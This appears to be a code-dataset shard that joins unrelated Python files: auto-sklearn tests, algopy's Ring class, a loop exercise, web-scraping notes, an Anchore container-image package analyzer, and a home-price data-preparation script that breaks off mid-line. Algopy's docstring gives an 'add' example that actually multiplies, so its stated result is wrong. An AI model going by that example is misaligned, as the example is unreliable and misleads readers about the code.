test_load_best_individual_model(self): backend_api = self._create_backend('test_fit') for metric in [log_loss, balanced_accuracy]: X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=metric, ) with unittest.mock.patch( 
'autosklearn.ensemble_builder.EnsembleBuilder.run' ) as mock_ensemble_run: mock_ensemble_run.side_effect = MemoryError automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) # A memory error occurs in the ensemble construction self.assertIsNone(automl._backend.load_ensemble(automl._seed)) # The load model is robust to this and loads the best model automl._load_models() self.assertIsNotNone(automl.ensemble_) # Just 1 model is there for ensemble and all weight must be on it get_models_with_weights = automl.get_models_with_weights() self.assertEqual(len(get_models_with_weights), 1) self.assertEqual(get_models_with_weights[0][0], 1.0) # Match a toy dataset if metric._sign < 0: self.assertLessEqual(automl.score(X_test, Y_test), 0.2) else: self.assertGreaterEqual(automl.score(X_test, Y_test), 0.8) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fail_if_feat_type_on_pandas_input(self): """We do not support feat type when pandas is provided as an input """ backend_api = self._create_backend('test_fail_feat_pandas') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]}) y_train = [1, 0] with self.assertRaisesRegex(ValueError, "feat_type cannot be provided when using pandas"): automl.fit( X_train, y_train, task=BINARY_CLASSIFICATION, feat_type=['Categorical', 'Numerical'], ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fail_if_dtype_changes_automl(self): """We do not support changes in the input type. Once a estimator is fitted, it should not change data type """ backend_api = self._create_backend('test_fail_feat_typechange') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]}) y_train = [1, 0] automl.InputValidator.validate(X_train, y_train, is_classification=True) with self.assertRaisesRegex(ValueError, "Auto-sklearn previously received features of type"): automl.fit( X_train.to_numpy(), y_train, task=BINARY_CLASSIFICATION, ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) if __name__ == "__main__": unittest.main()
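The dummy-prediction test above drives a patched run() through a series of return tuples and asserts on the resulting error messages. The underlying unittest.mock pattern can be sketched in isolation like this; Worker and do_work are made-up names used purely for illustration, not auto-sklearn classes.

import unittest
import unittest.mock


class Worker:
    def run(self):                      # stands in for the patched ta.run()
        raise RuntimeError("not used once patched")


def do_work(worker):
    status, cost, runtime, info = worker.run()
    if status != "SUCCESS":
        raise ValueError("run failed with state %s and additional output: %s" % (status, info))
    return info


class MockPatternTest(unittest.TestCase):
    @unittest.mock.patch.object(Worker, "run")
    def test_do_work(self, run_mock):
        # a successful status passes through
        run_mock.return_value = ("SUCCESS", None, None, "ok")
        self.assertEqual(do_work(Worker()), "ok")
        # any other status surfaces as a ValueError carrying the mocked output
        run_mock.return_value = ("CRASHED", None, None, "boom")
        self.assertRaisesRegex(ValueError, "CRASHED", do_work, Worker())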
2.015625
2
algopy/base_type.py
arthus701/algopy
54
11856
""" This implements an abstrace base class Ring . Rationale: Goal is to separate the datatype specification from the algorithms and containers for the following reasons: 1) It allows to directly use the algorithms *without* overhead. E.g. calling mul(z.data, x.data, y.data) has much less overhead than z = x.__mul__(y). data is to be kept as close as possible to machine primitives. E.g. data is array or tuple of arrays. 2) Potential reuse of an algorithm in several datatypes. 3) Relatively easy to connect high performance algorithms with a very highlevel abstract description. For instance, most programming languages allow calling C-functions. Therefore, the algorithms should be given as void fcn(int A, double B, ...) For instance, the datatype is a truncated Taylor polynomial R[t]/<t^D> of the class Foo. The underlying container is a simple array of doubles. """ import numpy class Ring(object): """ An abstract base class in an attempt to follow the DRY principle. It implements the algebraic class of a ring as defined on http://en.wikipedia.org/wiki/Ring_%28mathematics%29 The idea is that the set is described in data and the operations +,* etc. are implemented as functions that operate on the data. E.g. the factor ring of natural numbers modulo 4, x.data = 3 y.data = 2 then z = add(x,y) is implemented as def add(x,y): return self.__class__((x.data*y.data)%4) and one obtains z.data = 1 Warning: Since this class is only of little value it may be deprecated in the future. """ data = NotImplementedError() def totype(self, x): """ tries to convert x to an object of the class works for : scalar x, numpy.ndarray x Remark: at the moment, scalar x expanded as Ring with the same degree as self though. The reason is a missing implementation that works for graded rings of different degree. Once such implementations exist, this function should be adapted. """ if numpy.isscalar(x): xdata = self.__class__.__zeros_like__(self.data) self.__class__.__scalar_to_data__(xdata, x) return self.__class__(xdata) elif isinstance(x, numpy.ndarray): raise NotImplementedError('sorry, not implemented just yet') elif not isinstance(x, self.__class__): raise NotImplementedError('Cannot convert x\n type(x) = %s but expected type(x) = %s'%(str(type(x)))) else: return x def __add__(self, rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.add(retval.data, self.data, rhs.data) return retval def __sub__(self, rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.sub(retval.data, self.data, rhs.data) return retval def __mul__(self,rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.mul(retval.data, self.data, rhs.data) return retval def __truediv__(self,rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.div(retval.data, self.data, rhs.data) return retval def __radd__(self, lhs): return self + lhs def __rmul__(self, lhs): return self * lhs def zeros_like(self): return self.__class__(self.__class__.__zeros_like__(self.data)) def __str__(self): return str(self.data)
3.578125
4
estrutura-repeticao-while/ex062.py
TacilioRodriguez/Python
0
11857
<filename>estrutura-repeticao-while/ex062.py<gh_stars>0
"""
Improve Challenge 061 by asking the user whether they want to show a few more
terms. The program ends when the user says they want to show 0 more terms.
"""
primeiro = int(input('Enter the first term: '))
razao = int(input('Enter the common difference: '))
termo = primeiro
cont = 1
total = 0
mais = 10
while mais != 0:
    total = total + mais
    while cont <= total:
        print('{} -> '.format(termo), end=' ')
        termo = termo + razao
        cont = cont + 1
    print('Pause')
    mais = int(input('How many more terms do you want to show? '))
print('END')
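The same "show N terms, then ask for more" loop can also be expressed with a generator, which keeps the progression state out of the counting logic. A small alternative sketch (the function and variable names are new; the behaviour is the one described in the docstring):

from itertools import count, islice

def show_progression(first, step, chunk=10):
    terms = count(first, step)              # infinite arithmetic progression
    more = chunk
    while more != 0:
        for value in islice(terms, more):
            print('{} -> '.format(value), end=' ')
        print('Pause')
        more = int(input('How many more terms do you want to show? '))
    print('END')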
3.703125
4
Udemy_PythonBootcamp/Sec15_WebScraping.py
gonzalosc2/LearningPython
0
11858
####################################
# author: <NAME>
# course: 2020 Complete Python Bootcamps: From Zero to Hero in Python
# purpose: lecture notes
# description: Section 15 - Web Scraping
# other: N/A
####################################

# RULES
# 1. always try to get permission before scraping, otherwise I might be blocked
# 2. check the laws of whatever country we are operating in (for legal issues)

# LIMITATIONS
# each website is unique -> so for each website there must exist a Python script
# an update to a website might break my script

import requests
import bs4

# Grabbing a title
result = requests.get("http://example.com")
type(result)
result.text

# bs with lxml transforms the previous raw html into the following
soup = bs4.BeautifulSoup(result.text, 'lxml')
soup

# returns the tag we specified as a list (i.e., there might be more than one)
soup.select('title')
soup.select('title')[0].getText()
soup.select('p')

site_paragraphs = soup.select('p')
type(site_paragraphs[0])  # not a string, instead is a specialized bs object,
# which is why we can do something like call .getText()

# Grabbing a class (from CSS) using soup.select()
# 'div'         : all elements with 'div' tag
# '#some_id'    : elements containing id='some_id'
# '.some_class' : elements containing class='some_class'
# 'div span'    : any element named span within a div element
# 'div > span'  : any element named span directly within a div element, with
#                 nothing in between
res = requests.get("https://en.wikipedia.org/wiki/Jonas_Salk")
soup = bs4.BeautifulSoup(res.text, 'lxml')
soup.select('.toctext')[0].text
soup.select('.toctext')[0].getText()

for item in soup.select('.toctext'):
    print(item.text)

# Grabbing an image
# soup.select('img')  # can return more than what is needed (it will depend on
# the website)
soup.select('.thumbimage')
jonas_salk = soup.select('.thumbimage')[0]
jonas_salk['src']  # we can treat it as a dictionary

image_link = requests.get('http://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Roosevelt_OConnor.jpg/220px-Roosevelt_OConnor.jpg')
# image_link.content  # raw content of the image which is a binary file

# make sure to use the same format that the image has
f = open('my_image_image.jpg', 'wb')  # wb means write binary
f.write(image_link.content)
f.close()

# Multiple elements across multiple pages
# GOAL: get title of every book with a 2 star rating
# Check that this also works with page 1
# http://books.toscrape.com/catalogue/page-2.html
base_url = 'http://books.toscrape.com/catalogue/page-{}.html'
req = requests.get(base_url.format(1))
soup = bs4.BeautifulSoup(req.text, 'lxml')
products = soup.select(".product_pod")  # always check the length, in this case should be 20
example = products[0]

# one way (not useful every time)
'star-rating Two' in str(example)
# another way (checking for the presence of a class)
example.select('.star-rating.Three')  # if there is a space in a class we should add a dot
example.select('.star-rating.Two')  # nothing
example.select('a')[1]['title']

two_star_titles = []
for n in range(1, 51):
    scrape_url = base_url.format(n)
    req = requests.get(scrape_url)
    soup = bs4.BeautifulSoup(req.text, 'lxml')
    books = soup.select(".product_pod")
    for book in books:
        if len(book.select('.star-rating.Two')) != 0:
            two_star_titles.append(book.select('a')[1]['title'])

two_star_titles
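# ---------------------------------------------------------------------------
# Illustrative addition (not part of the original lecture notes): a small,
# self-contained check of the selector rules listed above, run on an inline
# HTML snippet instead of a live website so no network access is needed.
# The names _html and _demo are made up for this example.
_html = """
<div id="top" class="box">
  <span>direct child</span>
  <p><span>nested grandchild</span></p>
</div>
"""
_demo = bs4.BeautifulSoup(_html, 'lxml')
_demo.select('#top')        # by id       -> the single div
_demo.select('.box')        # by class    -> the single div
_demo.select('div span')    # any depth   -> both spans
_demo.select('div > span')  # direct only -> just the first span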
4.125
4
anchore_engine/analyzers/modules/33_binary_packages.py
dspalmer99/anchore-engine
0
11859
#!/usr/bin/env python3 import sys import os import re import json import traceback import pkg_resources import tarfile from collections import OrderedDict import anchore_engine.analyzers.utils, anchore_engine.utils def get_python_evidence(tfl, member, memberhash, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) el = {} el.update(binary_package_el) patt_bin = re.match("^python([0-9]+\.[0-9]+)$", filename) patt_lib = re.match("^libpython([0-9]+\.[0-9]+).so.*$", filename) if (patt_bin or patt_lib) and member.isreg(): f_vers = "" if patt_bin: f_vers = patt_bin.group(1) elif patt_lib: f_vers = patt_lib.group(1) with tfl.extractfile(member) as FH: for line in FH.readlines(): subline = line try: the_re = ".*{}\.([0-9]+[-_a-zA-Z0-9]*).*".format(f_vers) patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline) if patt and f_vers: b_vers = "{}.{}".format(f_vers, anchore_engine.utils.ensure_str(patt.group(1))) if b_vers.startswith(f_vers): el['name'] = 'python' el['version'] = b_vers el['location'] = fullpath evidence['python']['binary'].append( el ) break except Exception as err: raise err elif filename == "patchlevel.h" and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): line = line.strip() patt = re.match(b".*#define +PY_VERSION +\"*([0-9\.\-_a-zA-Z]+)\"*", line) if patt: h_vers = anchore_engine.utils.ensure_str(patt.group(1)) el['name'] = 'python' el['version'] = h_vers el['location'] = fullpath evidence['python']['devel'].append(el) break def get_golang_evidence(tfl, member, memberhash, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) el = {} el.update(binary_package_el) if filename in ['go'] and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): subline = line try: the_re = ".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*" patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline) if patt: vers = anchore_engine.utils.ensure_str(patt.group(1)) el['name'] = 'go' el['version'] = vers el['location'] = fullpath evidence['go']['binary'].append( el ) break except Exception as err: raise err elif filename == "VERSION" and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): line = line.strip() patt = re.match(b".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*", line) if patt: vers = anchore_engine.utils.ensure_str(patt.group(1)) final_loc = fullpath if memberhash.get(os.path.join(os.path.dirname(member.name), 'bin', 'go'), None): final_loc = os.path.join("/", os.path.dirname(member.name), 'bin', 'go') el['name'] = 'go' el['version'] = vers el['location'] = final_loc evidence['go']['devel'].append( el ) break def get_busybox_evidence(tfl, member, memberhash, distrodict, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) if filename == "busybox" and (member.isreg() or member.islnk()): # Perform any specific checks using prior metadata if distrodict.get('flavor', "") == 'BUSYB': patt = re.match(".*([0-9]+\.[0-9]+\.[0-9]+).*", distrodict.get('fullversion', "")) if patt: version = anchore_engine.utils.ensure_str(patt.group(1)) el = {} el.update(binary_package_el) el['name'] = 'busybox' el['version'] = version el['location'] = fullpath evidence['busybox']['binary'].append(el) analyzer_name = "package_list" try: config = anchore_engine.analyzers.utils.init_analyzer_cmdline(sys.argv, 
analyzer_name) except Exception as err: print(str(err)) sys.exit(1) imgname = config['imgid'] imgid = config['imgid_full'] outputdir = config['dirs']['outputdir'] unpackdir = config['dirs']['unpackdir'] squashtar = os.path.join(unpackdir, "squashed.tar") resultlist = {} version_found_map = {} binary_package_el = { 'name': None, 'version': None, 'location': None, 'type': 'binary', 'files': [], 'license': 'N/A', 'origin': 'N/A', 'metadata': json.dumps({}) } try: allfiles = {} if os.path.exists(unpackdir + "/anchore_allfiles.json"): with open(unpackdir + "/anchore_allfiles.json", 'r') as FH: allfiles = json.loads(FH.read()) else: fmap, allfiles = anchore_engine.analyzers.utils.get_files_from_squashtar(os.path.join(unpackdir, "squashed.tar")) with open(unpackdir + "/anchore_allfiles.json", 'w') as OFH: OFH.write(json.dumps(allfiles)) # read in previous analyzer output for helping to increase accuracy of findings fname = os.path.join(outputdir, 'pkgfiles.all') pkgfilesall = anchore_engine.analyzers.utils.read_kvfile_todict(fname) meta = anchore_engine.analyzers.utils.get_distro_from_squashtar(os.path.join(unpackdir, "squashed.tar"), unpackdir=unpackdir) distrodict = anchore_engine.analyzers.utils.get_distro_flavor(meta['DISTRO'], meta['DISTROVERS'], likedistro=meta['LIKEDISTRO']) # set up ordered dictionary structure for the runtimes and evidence types evidence = OrderedDict() for runtime in ['python', 'go', 'busybox']: evidence[runtime] = OrderedDict() for etype in ['binary', 'devel']: evidence[runtime][etype] = [] # Perform a per file routine to evaluate files for gathering binary package version evidence with tarfile.open(os.path.join(unpackdir, "squashed.tar"), mode='r', format=tarfile.PAX_FORMAT) as tfl: alltnames = tfl.getnames() alltfiles = {} for name in alltnames: alltfiles[name] = True memberhash = anchore_engine.analyzers.utils.get_memberhash(tfl) for member in list(memberhash.values()): try: get_python_evidence(tfl, member, memberhash, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for python runtime evidence: {}".format(member.name, str(err))) try: get_golang_evidence(tfl, member, memberhash, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for golang runtime evidence: {}".format(member.name, str(err))) try: get_busybox_evidence(tfl, member, memberhash, distrodict, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for busybox runtime evidence: {}".format(member.name, str(err))) resultlist = {} for runtime in evidence.keys(): #['python', 'go']: for e in evidence[runtime].keys(): #['binary', 'devel']: for t in evidence[runtime][e]: version = t.get('version') location = t.get('location') if location in pkgfilesall: print ("INFO: Skipping evidence {} - file is owned by OS package".format(location)) else: key = "{}-{}".format(runtime, version) if key not in version_found_map: result = {} result.update(binary_package_el) result.update(t) result['metadata'] = json.dumps({"evidence_type": e}) resultlist[location] = json.dumps(result) version_found_map[key] = True try: squashtar = os.path.join(unpackdir, "squashed.tar") hints = anchore_engine.analyzers.utils.get_hintsfile(unpackdir, squashtar) for pkg in hints.get('packages', []): pkg_type = pkg.get('type', "").lower() if pkg_type == 'binary': try: pkg_key, el = anchore_engine.analyzers.utils._hints_to_binary(pkg) try: resultlist[pkg_key] = json.dumps(el) except Exception as err: print ("WARN: unable to add binary package ({}) 
from hints - excpetion: {}".format(pkg_key, err)) except Exception as err: print ("WARN: bad hints record encountered - exception: {}".format(err)) except Exception as err: print ("WARN: problem honoring hints file - exception: {}".format(err)) except Exception as err: import traceback traceback.print_exc() print("WARN: analyzer unable to complete - exception: " + str(err)) if resultlist: ofile = os.path.join(outputdir, 'pkgs.binary') anchore_engine.analyzers.utils.write_kvfile_fromdict(ofile, resultlist) #print ("RESULT: {}".format(resultlist)) sys.exit(0)
2.125
2
SF-home-price-prediction/src/preparation.py
apthomas/SF-home-price-prediction
0
11860
import pandas as pd import numpy as np import csv import urllib.request import json from datetime import datetime from datetime import timedelta from sklearn.preprocessing import MinMaxScaler import web_scrapers import os def load_real_estate_data(filename, state_attr, state): df = pd.read_csv(filename, encoding="ISO-8859-1") df = df.loc[df[state_attr] == state] return df def load_data(filenames): df_list=[] for i in range(0, len(filenames)): df = pd.read_csv(filenames[i], encoding="ISO-8859-1") df_list.append(df) return df_list def create_zipcode_list(filenames): zipcodes = {} # structured with within 5, 10 miles from another zipcode zip_list = [] for i in range(0, len(filenames)): with open(filenames[i], 'r', encoding='utf-8-sig') as f: reader = csv.reader(f) your_list = list(reader) for z in range(0, len(your_list)): zipcodes[your_list[z][0]] = [], [] zip_list.append(your_list[z][0]) return zipcodes, zip_list def wrangle_real_estate_data(df, zip_list, drop_columns): df = df[df['RegionName'].isin(zip_list)] df = df.drop(drop_columns, axis=1) return df def wrangle_IPO_data(df, zip_list): df['Date Filed'] = pd.to_datetime(df['Date Filed'], format='%Y-%m-%d') df['Lockup Expiration Date'] = pd.to_datetime(df['Lockup Expiration Date'], errors='coerce', format='%m/%d/%Y') df = df[df['Zipcode'].isin(zip_list)] df = df.drop(['Lockup Expiration Date'], axis=1) df['Lockup Expiration Date'] = df['Date Filed'] + timedelta(days=180) df = df[df['Date Filed']> df['Date Filed'].min()+ timedelta(days=366)] return df def wrangle_census_data(df_census_econ, df_census_dem, zip_list, census_econ_columns, census_dem_columns): df_census_econ.rename(columns={'Id2': 'Zipcode'}, inplace=True) df_census_econ.rename( columns={'Percent; EMPLOYMENT STATUS - Civilian labor force - Unemployment Rate': 'Unemployment Rate'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Less than $10,000': 'l10000'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $10,000 to $14,999': 'l15000'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $15,000 to $24,999': 'l25000'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; COMMUTING TO WORK - Mean travel time to work (minutes)': 'Mean Travel Time to Work Estimate (minutes)'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $200,000 or more': 'Percent of Households with Income Greater than $200,000'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Median household income (dollars)': 'Median Household Income Estimate (dollars)'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Mean household income (dollars)': 'Mean Household Income Estimate (dollars)'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Per capita income (dollars)': 'Per Capita Income Estimate (dollars)'}, inplace=True) df_census_econ.rename(columns={ 'Percent; HEALTH INSURANCE COVERAGE - Civilian noninstitutionalized population - No health insurance coverage': 'Percent of Population with no Health Insurance Coverage'}, inplace=True) 
df_census_econ.rename(columns={ 'Percent; PERCENTAGE OF FAMILIES AND PEOPLE WHOSE INCOME IN THE PAST 12 MONTHS IS BELOW THE POVERTY LEVEL - All people': 'Percent of People whose Income in the Past 12 months has been Below Poverty Level'}, inplace=True) df_census_econ['l10000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l10000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l10000'] = df_census_econ['l10000'].astype(float) df_census_econ['l15000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l15000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l15000'] = df_census_econ['l15000'].astype(float) df_census_econ['l25000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l25000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l25000'] = df_census_econ['l25000'].astype(float) df_census_econ["Percent of Households With Income Less Than $24,999"] = df_census_econ['l10000'] + df_census_econ[ 'l15000'] + df_census_econ['l25000'] df_census_econ = df_census_econ.filter(census_econ_columns) df_census_dem.rename(columns={'Id2': 'Zipcode'}, inplace=True) df_census_dem.rename(columns={'Estimate; SEX AND AGE - Median age (years)': 'Median Age'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - Under 18 years': 'Percent of People under 18 years of age'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 65 years and over': 'Percent of People 65 years and over'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Male': 'Percent of Males'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Female': 'Percent of Females'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Hispanic or Latino (of any race)': 'Percent of People who are Hispanic'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - White alone': 'Percent of People who are White'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Black or African American alone': 'Percent of People who are Black or African American'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Asian alone': 'Percent of People who are Asian'}, inplace=True) df_census_dem = df_census_dem.filter(census_dem_columns) # filter data to only Silicon Valley + San Francisco Zip Codes df_census_dem = df_census_dem[df_census_dem['Zipcode'].isin(zip_list)] df_census_econ = df_census_econ[df_census_econ['Zipcode'].isin(zip_list)] return df_census_econ, df_census_dem def wrangle_real_estate_headers(df): ''' run before joining dataframes so keys match df_sale_counts_by_zip_silicon_valley.columns = df_sale_counts_by_zip_silicon_valley.columns.str.replace('Sales Counts ', '') df_sale_counts_by_zip_silicon_valley = df_sale_counts_by_zip_silicon_valley.add_prefix('Sales Counts ') df_sale_counts_by_zip_silicon_valley.rename(columns = {'Sales Counts RegionName':'Zipcode'}, inplace=True) ''' df.columns = df.columns.str.replace('All Homes ', '') df = df.add_prefix('All Homes ') df.rename(columns={'All Homes RegionName': 'Zipcode'}, inplace=True) return df def wrangle_ipo_headers(df): df.rename(columns={'Ticker': 'Symbol'}, inplace=True) df["Found"] = df["Found"].astype(dtype=np.int64) return df def 
join_data(df1, df2, key, join_type): df = df1.set_index(key).merge(df2, on=key, how=join_type) return df def merge_data(df1, df2, key): df = pd.merge(df1, df2, on=key, how='inner') return df def df_replace(df, replace_list): for i in range(0, len(replace_list)): df = df.replace([replace_list[i]], [''], regex=True) return df def drop_columns_and_nans(df, drop_columns, nan_columns): df = df.drop(['IPO Name', 'Offer date', 'CUSIP', 'PERM'], axis=1) for i in range(0, len(nan_columns)): df.drop_duplicates(subset=nan_columns[i], keep='first', inplace=True) return df def calculate_distance_between_zips(zipcode, min_radius, max_radius): # api-endpoint URL_base = "https://api.zip-codes.com/ZipCodesAPI.svc/1.0/FindZipCodesInRadius?zipcode=" URL = URL_base + zipcode + '&minimumradius=' + min_radius + '&maximumradius=' + max_radius + '&key=<KEY>' # sending get request and saving the response as response object contents = urllib.request.urlopen(URL).read() # printing the output zipcodes_nearby = [] print(json.loads(contents)) for i in range(1, len(json.loads(contents)['DataList'])): zipcodes_nearby.append(json.loads(contents)['DataList'][i]['Code']) return zipcodes_nearby def create_zipcode_distances_dictionary(zipcodes, zip_list): ''' ***DONT RUN IF THESE ARE ALREADY CREATED*** currently stored as data/processed/zipcodes_within_radius.txt ''' print(len(zip_list)) for i in range(0, len(zip_list)): zipcodes[zip_list[i]] = calculate_distance_between_zips(zip_list[i], '0', '5'), calculate_distance_between_zips( zip_list[i], '5', '10') return zipcodes def create_text_file_from_dictionary(filename, dictionary): ''' with open('data/processed/zipcodes_within_radius.txt', 'w') as json_file: json.dump(zipcodes, json_file) ''' with open(filename, 'w') as json_file: json.dump(dictionary, json_file) return dictionary def export_dataframe_to_dictionary(df, name): filename = 'data/processed/' + name + '.csv' export_csv = df.to_csv(filename, index=True, header=True) # Don't forget to add '.csv' at the end of the path def update_zipcodes_dict(zipcodes, zip_list): exists = os.path.isfile('../data/processed/zipcodes_within_radius.txt') if not exists: zipcodes = create_zipcode_distances_dictionary(zipcodes, zip_list) create_text_file_from_dictionary('../data/processed/zipcodes_within_radius.txt', zipcodes) else: zipcodes = {} with open('../data/processed/zipcodes_within_radius.txt', 'r') as f: zipcodes = json.load(f) return zipcodes def create_IPO_an_Zipcode_dataframe(census_econ_cols, census_dem_cols, df_ipo, df_zip, zipcodes): if 'Zipcode' in census_econ_cols: census_econ_cols.remove('Zipcode') if 'Zipcode' in census_dem_cols: census_dem_cols.remove('Zipcode') ipo_header_list = list(df_ipo.columns.values) +census_dem_cols+census_econ_cols + ['All Homes Date Filed', 'All Homes Lockup Expiration Date', 'All Homes 1 Year Before Date Filed', 'All Homes 2 Years After Date Filed'] ''' Distance from IPO = estimate is .2 if in the same zipcode as IPO = estimate is 0.5 if not in same zip code as IPO and less than 5 miles from zipcode to IPO = estimate is 1 if greater than 5 and less than 10 miles from zipcode to IPO ''' new_df_list = [] for index, row in df_ipo.iterrows(): ipo_zipcode = str(row['Zipcode']) zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(ipo_zipcode)] headerList = join_IPO_and_Zip_Data(row['Date Filed'], row['Lockup Expiration Date'], census_econ_cols,census_dem_cols) data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) 
dictionary['Symbol'] = index dictionary['Distance to IPO'] = .2 dictionary['Zipcode for Distance'] = ipo_zipcode new_df_list.append(dictionary) within_5miles = zipcodes[ipo_zipcode][0] within_10miles = zipcodes[ipo_zipcode][1] for i in range(0, len(within_5miles)): zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_5miles[i])] data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) dictionary['Symbol'] = index dictionary['Distance to IPO'] = .5 dictionary['Zipcode for Distance'] = within_5miles[i] new_df_list.append(dictionary) for j in range(0, len(within_10miles)): zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_10miles[j])] data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) dictionary['Symbol'] = index dictionary['Distance to IPO'] = 1 dictionary['Zipcode for Distance'] = within_10miles[j] new_df_list.append(dictionary) ipo_final_df = pd.DataFrame(new_df_list) ipo_final_df.dropna(subset=['Median Age'], how='all', inplace=True) ipo_final_df.dropna(subset=['All Homes Date Filed'], how='all', inplace=True) return ipo_final_df def normalize_IPO_an_Zipcode_dataframe(normalization_list, df_ipo): df_ipo = df_ipo.replace(['--'], [''], regex=True) df_ipo = df_ipo.replace(r'^\s*$', np.nan, regex=True) df_ipo = df_ipo.replace(['\,'], [''], regex=True) df_ipo = df_ipo.replace(['\+'], [''], regex=True) scaler = MinMaxScaler() df_ipo[normalization_list] = scaler.fit_transform(df_ipo[normalization_list]) return df_ipo def join_IPO_and_Zip_Data(IPO_Date_Filed, IPO_Lockup_Expiration_Date, census_econ_cols, census_dem_cols): filtered_columns = census_dem_cols +census_econ_cols # remove 'zipcode' ipo_month_filed = IPO_Date_Filed.month ipo_year_filed = IPO_Date_Filed.year AllHomes_header_filed = 'All Homes ' + str(ipo_year_filed) + '-' + str(ipo_month_filed).zfill(2) ipo_month = IPO_Lockup_Expiration_Date.month ipo_year = IPO_Lockup_Expiration_Date.year AllHomes_header_lockup = 'All Homes ' + str(ipo_year) + '-' + str(ipo_month).zfill(2) AllHomes_header_filed_1_yr_ago = 'All Homes ' + str(int(ipo_year_filed) - 1) + '-' + str(ipo_month_filed).zfill(2) AllHomes_header_filed_2_yr = 'All Homes ' + str(int(ipo_year_filed) + 2) + '-' + str(ipo_month_filed).zfill(2) filtered_columns = filtered_columns + [AllHomes_header_filed, AllHomes_header_lockup, AllHomes_header_filed_1_yr_ago, AllHomes_header_filed_2_yr] return filtered_columns def update_ipo_list(year, start_month, end_month): web_scrapers.add_new_ipo_data_to_csv('../data/processed/1997-04_2019_full_ipo_data.csv', year, start_month, end_month) df_ipo_list = load_data(['../data/processed/1997-04_2019_full_ipo_data.csv', '../data/raw/ipo_ritter_data.csv']) zipcodes, zip_list = create_zipcode_list( ['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv', '../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv']) df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list) df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1]) df_ipo = join_data(df_ipo, 